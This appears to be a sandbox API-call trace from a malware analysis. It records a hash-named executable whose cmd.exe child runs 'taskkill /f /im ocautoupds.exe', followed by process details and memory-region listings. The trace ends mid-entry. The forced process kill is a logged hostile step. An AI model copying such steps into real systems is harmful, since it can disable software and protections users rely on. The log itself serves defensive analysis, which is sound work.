[0172.230] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0172.230] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0172.230] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0172.230] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0172.230] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0172.230] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0172.230] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0172.230] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0172.231] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0172.231] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0172.231] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0172.231] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0172.231] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0172.231] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0172.231] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0172.231] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0172.231] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0172.231] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0172.231] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0172.231] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0172.231] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0172.231] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0172.231] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0172.231] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0172.231] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0172.231] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0172.231] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0172.231] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0172.231] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0172.231] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0172.231] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0172.231] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0172.232] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0172.232] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0172.232] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0172.232] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0172.232] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0172.232] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0172.232] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0172.232] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0172.232] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0172.232] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0172.232] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0172.232] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0172.232] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0172.232] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0172.232] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0172.232] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0172.232] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0172.232] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0172.232] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0172.232] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0172.232] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0172.232] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0172.232] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0172.232] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0172.232] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0172.232] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0172.232] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0172.233] GetProcessHeap () returned 0x4d0000 [0172.233] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4dad20 [0172.233] GetProcessHeap () returned 0x4d0000 [0172.233] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4a) returned 0x4daf38 [0172.233] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0172.233] GetProcessHeap () returned 0x4d0000 [0172.233] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x418) returned 0x4d05c8 [0172.233] SetErrorMode (uMode=0x0) returned 0x8003 [0172.233] SetErrorMode (uMode=0x1) returned 0x0 [0172.234] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0172.234] SetErrorMode (uMode=0x8003) returned 0x1 [0172.234] GetProcessHeap () returned 0x4d0000 [0172.234] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d05c8, Size=0x56) returned 0x4d05c8 [0172.234] GetProcessHeap () returned 0x4d0000 [0172.234] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4d05c8) returned 0x56 [0172.234] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0172.234] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0172.234] GetProcessHeap () returned 0x4d0000 [0172.234] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x110) returned 0x4daf90 [0172.234] GetProcessHeap () returned 0x4d0000 [0172.234] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x218) returned 0x4d0628 [0172.239] GetProcessHeap () returned 0x4d0000 [0172.239] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d0628, Size=0x112) returned 0x4d0628 [0172.239] GetProcessHeap () returned 0x4d0000 [0172.239] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4d0628) returned 0x112 [0172.239] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0172.239] GetProcessHeap () returned 0x4d0000 [0172.239] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe0) returned 0x4db0a8 [0172.241] GetProcessHeap () returned 0x4d0000 [0172.241] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4db0a8, Size=0x76) returned 0x4db0a8 [0172.241] GetProcessHeap () returned 0x4d0000 [0172.241] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4db0a8) returned 0x76 [0172.241] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.241] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0172.242] GetLastError () returned 0x2 [0172.242] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.242] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x4db128 [0172.242] GetProcessHeap () returned 0x4d0000 [0172.242] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x14) returned 0x4d76f0 [0172.242] FindClose (in: hFindFile=0x4db128 | out: hFindFile=0x4db128) returned 1 [0172.242] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0172.242] GetLastError () returned 0x2 [0172.243] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x4db128 [0172.243] GetProcessHeap () returned 0x4d0000 [0172.243] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d76f0, Size=0x4) returned 0x4db168 [0172.243] FindClose (in: hFindFile=0x4db128 | out: hFindFile=0x4db128) returned 1 [0172.243] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0172.243] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0172.243] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0172.245] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0172.245] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0172.246] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0172.246] GetProcessHeap () returned 0x4d0000 [0172.246] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x18) returned 0x4d7450 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.246] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.247] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.247] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.247] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.256] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.256] GetProcessHeap () returned 0x4d0000 [0172.256] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4d7450) returned 1 [0172.256] GetProcessHeap () returned 0x4d0000 [0172.257] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa) returned 0x4db128 [0172.257] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0172.260] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im ocautoupds.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im ocautoupds.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im ocautoupds.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x10a0, dwThreadId=0x1300)) returned 1 [0172.287] CloseHandle (hObject=0x98) returned 1 [0172.288] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0172.288] GetProcessHeap () returned 0x4d0000 [0172.288] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4d9d58) returned 1 [0172.288] GetEnvironmentStringsW () returned 0x4d9d58* [0172.288] GetProcessHeap () returned 0x4d0000 [0172.288] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa76) returned 0x4d7cc8 [0172.288] FreeEnvironmentStringsA (penv="=") returned 1 [0172.288] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0174.361] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0174.362] CloseHandle (hObject=0x9c) returned 1 [0174.362] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0174.363] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0174.363] GetProcessHeap () returned 0x4d0000 [0174.364] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4d7cc8) returned 1 [0174.364] GetEnvironmentStringsW () returned 0x4db178* [0174.364] GetProcessHeap () returned 0x4d0000 [0174.364] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa9c) returned 0x4d7cc8 [0174.364] FreeEnvironmentStringsA (penv="=") returned 1 [0174.364] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0174.364] GetProcessHeap () returned 0x4d0000 [0174.364] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4d7cc8) returned 1 [0174.364] GetEnvironmentStringsW () returned 0x4db178* [0174.364] GetProcessHeap () returned 0x4d0000 [0174.364] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa9c) returned 0x4d7cc8 [0174.364] FreeEnvironmentStringsA (penv="=") returned 1 [0174.365] GetProcessHeap () returned 0x4d0000 [0174.365] RtlFreeHeap (HeapHandle=0x4d0000, Flags=0x0, BaseAddress=0x4db128) returned 1 [0174.365] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0174.365] _get_osfhandle (_FileHandle=1) returned 0x154 [0174.365] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0174.365] _get_osfhandle (_FileHandle=1) returned 0x154 [0174.365] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0174.365] _get_osfhandle (_FileHandle=0) returned 0x144 [0174.365] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0174.365] GetConsoleOutputCP () returned 0x1b5 [0174.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0174.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.370] exit (_Code=128) Thread: id = 213 os_tid = 0x1354 Process: id = "35" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x30e80000" os_pid = "0x10a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x134c" cmd_line = "taskkill /f /im ocautoupds.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2781 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2782 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2783 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2784 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2785 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2786 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2787 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2788 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2789 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2790 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2791 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2792 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2793 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2794 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2795 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2796 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2797 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2798 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2799 start_va = 0x4530000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 2800 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2801 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2802 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2803 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2804 start_va = 0x4540000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 2805 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2806 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2807 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2808 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2809 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2810 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2811 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2812 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2813 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2814 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 2815 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2816 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2817 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2818 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2819 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2820 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2821 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2822 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2823 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2824 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2825 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2826 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2827 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: 